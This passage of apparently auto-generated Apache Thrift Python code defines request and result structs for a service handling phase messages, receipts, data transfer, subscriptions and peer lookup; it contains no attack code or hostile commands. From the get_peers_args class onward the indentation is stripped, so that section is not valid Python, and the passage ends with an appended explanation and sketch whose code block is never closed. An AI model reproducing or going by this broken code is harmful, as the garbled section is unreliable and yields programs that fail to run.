      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_3_message_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRING, len(self.success))
      for iter115 in self.success:
        oprot.writeString(iter115)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_4_message_args:
  """
  Attributes:
   - p4
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'p4', (Phase_4_msg, Phase_4_msg.thrift_spec), None, ), # 1
  )

  def __init__(self, p4=None,):
    self.p4 = p4

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.p4 = Phase_4_msg()
          self.p4.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_4_message_args')
    if self.p4 is not None:
      oprot.writeFieldBegin('p4', TType.STRUCT, 1)
      self.p4.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.p4)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_4_message_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype119, _size116) = iprot.readListBegin()
          for _i120 in xrange(_size116):
            _elem121 = iprot.readString()
            self.success.append(_elem121)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_4_message_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRING, len(self.success))
      for iter122 in self.success:
        oprot.writeString(iter122)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_5_message_args:
  """
  Attributes:
   - p5
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'p5', (Phase_5_msg, Phase_5_msg.thrift_spec), None, ), # 1
  )

  def __init__(self, p5=None,):
    self.p5 = p5

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.p5 = Phase_5_msg()
          self.p5.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_5_message_args')
    if self.p5 is not None:
      oprot.writeFieldBegin('p5', TType.STRUCT, 1)
      self.p5.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.p5)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_5_message_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype126, _size123) = iprot.readListBegin()
          for _i127 in xrange(_size123):
            _elem128 = iprot.readString()
            self.success.append(_elem128)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_5_message_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRING, len(self.success))
      for iter129 in self.success:
        oprot.writeString(iter129)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class receipt_request_args:
  """
  Attributes:
   - pass_phrase
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'pass_phrase', None, None, ), # 1
  )

  def __init__(self, pass_phrase=None,):
    self.pass_phrase = pass_phrase

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.pass_phrase = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('receipt_request_args')
    if self.pass_phrase is not None:
      oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
      oprot.writeString(self.pass_phrase)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.pass_phrase)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class receipt_request_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype133, _size130) = iprot.readListBegin()
          for _i134 in xrange(_size130):
            _elem135 = iprot.readString()
            self.success.append(_elem135)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('receipt_request_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRING, len(self.success))
      for iter136 in self.success:
        oprot.writeString(iter136)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class transfer_data_args:
  """
  Attributes:
   - pass_phrase
   - received
   - unreceived
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'pass_phrase', None, None, ), # 1
    (2, TType.LIST, 'received', (TType.STRING,None), None, ), # 2
    (3, TType.LIST, 'unreceived', (TType.STRING,None), None, ), # 3
  )

  def __init__(self, pass_phrase=None, received=None, unreceived=None,):
    self.pass_phrase = pass_phrase
    self.received = received
    self.unreceived = unreceived

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.pass_phrase = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          self.received = []
          (_etype140, _size137) = iprot.readListBegin()
          for _i141 in xrange(_size137):
            _elem142 = iprot.readString()
            self.received.append(_elem142)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.LIST:
          self.unreceived = []
          (_etype146, _size143) = iprot.readListBegin()
          for _i147 in xrange(_size143):
            _elem148 = iprot.readString()
            self.unreceived.append(_elem148)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('transfer_data_args')
    if self.pass_phrase is not None:
      oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
      oprot.writeString(self.pass_phrase)
      oprot.writeFieldEnd()
    if self.received is not None:
      oprot.writeFieldBegin('received', TType.LIST, 2)
      oprot.writeListBegin(TType.STRING, len(self.received))
      for iter149 in self.received:
        oprot.writeString(iter149)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.unreceived is not None:
      oprot.writeFieldBegin('unreceived', TType.LIST, 3)
      oprot.writeListBegin(TType.STRING, len(self.unreceived))
      for iter150 in self.unreceived:
        oprot.writeString(iter150)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.pass_phrase)
    value = (value * 31) ^ hash(self.received)
    value = (value * 31) ^ hash(self.unreceived)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class transfer_data_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(VerificationRecord, VerificationRecord.thrift_spec)), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype154, _size151) = iprot.readListBegin()
          for _i155 in xrange(_size151):
            _elem156 = VerificationRecord()
            _elem156.read(iprot)
            self.success.append(_elem156)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('transfer_data_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter157 in self.success:
        iter157.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class subscription_provisioning_args:
  """
  Attributes:
   - subscription_id
   - criteria
   - phase_criteria
   - create_ts
   - public_key
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'subscription_id', None, None, ), # 1
    (2, TType.MAP, 'criteria', (TType.STRING,None,TType.STRING,None), None, ), # 2
    (3, TType.STRING, 'phase_criteria', None, None, ), # 3
    (4, TType.I32, 'create_ts', None, None, ), # 4
    (5, TType.STRING, 'public_key', None, None, ), # 5
  )

  def __init__(self, subscription_id=None, criteria=None, phase_criteria=None, create_ts=None, public_key=None,):
    self.subscription_id = subscription_id
    self.criteria = criteria
    self.phase_criteria = phase_criteria
    self.create_ts = create_ts
    self.public_key = public_key

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.subscription_id = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.MAP:
          self.criteria = {}
          (_ktype159, _vtype160, _size158 ) = iprot.readMapBegin()
          for _i162 in xrange(_size158):
            _key163 = iprot.readString()
            _val164 = iprot.readString()
            self.criteria[_key163] = _val164
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRING:
          self.phase_criteria = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.I32:
          self.create_ts = iprot.readI32()
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRING:
          self.public_key = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('subscription_provisioning_args')
    if self.subscription_id is not None:
      oprot.writeFieldBegin('subscription_id', TType.STRING, 1)
      oprot.writeString(self.subscription_id)
      oprot.writeFieldEnd()
    if self.criteria is not None:
      oprot.writeFieldBegin('criteria', TType.MAP, 2)
      oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.criteria))
      for kiter165,viter166 in self.criteria.items():
        oprot.writeString(kiter165)
        oprot.writeString(viter166)
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.phase_criteria is not None:
      oprot.writeFieldBegin('phase_criteria', TType.STRING, 3)
      oprot.writeString(self.phase_criteria)
      oprot.writeFieldEnd()
    if self.create_ts is not None:
      oprot.writeFieldBegin('create_ts', TType.I32, 4)
      oprot.writeI32(self.create_ts)
      oprot.writeFieldEnd()
    if self.public_key is not None:
      oprot.writeFieldBegin('public_key', TType.STRING, 5)
      oprot.writeString(self.public_key)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.subscription_id)
    value = (value * 31) ^ hash(self.criteria)
    value = (value * 31) ^ hash(self.phase_criteria)
    value = (value * 31) ^ hash(self.create_ts)
    value = (value * 31) ^ hash(self.public_key)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class subscription_provisioning_result:

  thrift_spec = (
  )

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('subscription_provisioning_result')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class subscription_request_args:
  """
  Attributes:
   - subscription_id
   - subscription_signature
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'subscription_id', None, None, ), # 1
    (2, TType.STRUCT, 'subscription_signature', (Signature, Signature.thrift_spec), None, ), # 2
  )

  def __init__(self, subscription_id=None, subscription_signature=None,):
    self.subscription_id = subscription_id
    self.subscription_signature = subscription_signature

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.subscription_id = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.subscription_signature = Signature()
          self.subscription_signature.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('subscription_request_args')
    if self.subscription_id is not None:
      oprot.writeFieldBegin('subscription_id', TType.STRING, 1)
      oprot.writeString(self.subscription_id)
      oprot.writeFieldEnd()
    if self.subscription_signature is not None:
      oprot.writeFieldBegin('subscription_signature', TType.STRUCT, 2)
      self.subscription_signature.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.subscription_id)
    value = (value * 31) ^ hash(self.subscription_signature)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class subscription_request_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.STRUCT, 'success', (SubscriptionResponse, SubscriptionResponse.thrift_spec), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = SubscriptionResponse()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('subscription_request_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class get_peers_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_peers_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_peers_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(Node, Node.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype170, _size167) = iprot.readListBegin()
for _i171 in xrange(_size167):
_elem172 = Node()
_elem172.read(iprot)
self.success.append(_elem172)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_peers_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter173 in self.success:
iter173.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
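Every generated `__hash__` above uses the same fold: seed the accumulator with 17, then mix each field in with `(value * 31) ^ hash(field)`. A minimal standalone sketch of that idiom (`PeerInfo` is a hypothetical struct, not part of the generated service):

```python
class PeerInfo(object):
    """Hypothetical two-field struct using the generated-code hash idiom."""

    def __init__(self, host, port):
        self.host = host
        self.port = port

    def __hash__(self):
        # seed with 17, then fold each field in with (value * 31) ^ hash(field)
        value = 17
        value = (value * 31) ^ hash(self.host)
        value = (value * 31) ^ hash(self.port)
        return value

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__


a = PeerInfo('10.0.0.1', 9090)
b = PeerInfo('10.0.0.1', 9090)
assert hash(a) == hash(b)       # equal structs hash equally
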